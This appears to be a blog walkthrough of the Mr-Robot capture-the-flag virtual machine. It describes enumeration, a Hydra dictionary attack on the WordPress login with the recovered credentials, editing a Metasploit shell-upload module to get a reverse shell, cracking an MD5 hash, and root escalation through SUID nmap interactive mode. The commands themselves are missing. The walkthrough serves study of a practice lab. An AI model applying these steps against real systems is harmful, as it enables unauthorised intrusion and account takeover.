Monday, June 18, 2018

Mr-Robot


MR-ROBOT

- Layout for this exercise:















1 - INTRODUCTION

- The goal of this exercise is the study of the hacking process for the vulnerable machine Mr-Robot.

- According to the description provided by the authors of Mr-Robot there are 3 keys or flags to be found:



- Mr-Robot can be downloaded from here:



-  Once downloaded and extracted with VirtualBox:





2 - ENUMERATION


- Using netdiscover to find the IP that corresponds to the vulnerable machine Mr-Robot:




- Scanning with Nmap:



 - Scanning with nikto we find a lot of information:









- After reading nikto output we learn that a WordPress page is running with a login PHP script, and also some other pages interesting to be studied.


- Connecting to the website:



- Having a look to the source:




- Checking the wp-login.php page:




- When trying to connect to the admin page it hangs up:




- Visiting wp-links-opml.php we learn that the website is running the version WordPress/4.3.16, what is outdated:




3 - EXPLOITATION

3.1 - robots.txt

- Also, robots.txt gives us key information to start the exploitation process:




- Opening key-1-of-3.txt we find the 1st key:



3.2 - Dictionary fsocity.dic

- Going to fsocity.dic and saving it for further study



- Copying to a working directory:



- Opening with cat we find a very long file text composed of a lot of lines what seem part of a dictionary:


......

......


- The first 10 lines:



- Counting the lines there are 858160, so no doubt this is a very complex file to be handled:



- How many of the 858160 lines are unique? Just 11451, so removing the repeated lines would make it easier to deal with the file:




- Let's create a new file ufsocity.dic that contains only the non repeated lines of the original text file:

 




- Now, the file ufsocity.dic can be used for exploitation purposes as a brute force dictionary or wordlist.


3.3 - Dictionary attack with Hydra

- Hydra and ufsocity.dic help to perform a dictionary attack against the login page.

- Before launching the attack let's see what type of error message uses the login page, for instance using non valid admin:admin as credentials:




- As expected there is an error message Invalid username:




- Using this information (F=Invalid username) let's find a username without caring for the password (-p wedontcare):




- We found a user elliot that can be used to try a login, :




- The error message confirms that elliot is correct as a username:



- Launching again Hydra, now passing the user elliot (-l elliot), we discover a password ER28-0652:


 

- Using elliot:ER28-0652 the login is successful:





3.4 - Reverse shell with Metasploit

- Taking advantage of the fact we have valid credentials we can try finding a reverse shell with Metasploit:


- Searching for wp_admin_shell_upload:





- Using this exploit and setting options:






- Runnig the exploit it fails, giving this error message: "The target does not appear to be using WordPress":



- Locating the exploit into Kali's file system:



- Opening it and uncommenting the line that contains the previous error message:






- Reloading the module:



- Once modified and reloaded, the exploit is successful:



- Getting a shell from the meterpreter session we find that a limited user is running:




- Checking the IP:



- Importing a new shell:



3.5 - Finding the second key

- Opening /home:



- At the robot user's home folder there is the 2nd key, but we cannot open it at this moment:




- However we have access to this password hashed with MD5:




- Decrypting:



- Trying to run the user robot with the previous password, it works:



- Now the 2nd key is available:




4 - PRIVILEGE ESCALATION

- Going to the root account we receive a Permission denied message:



- Let's find out files being run with root privileges:



- For instance Nmap version 3.81 



- There is a vulnerability associated to Nmap being run with special privileges like SUID root:



- Due to the presence of the SUID, using Nmap interactive mode we are able to run commands with root privileges:




- For instance a new root shell:




5 - CAPTURING THE FLAG

- Going to the root folder we find the final 3rd key: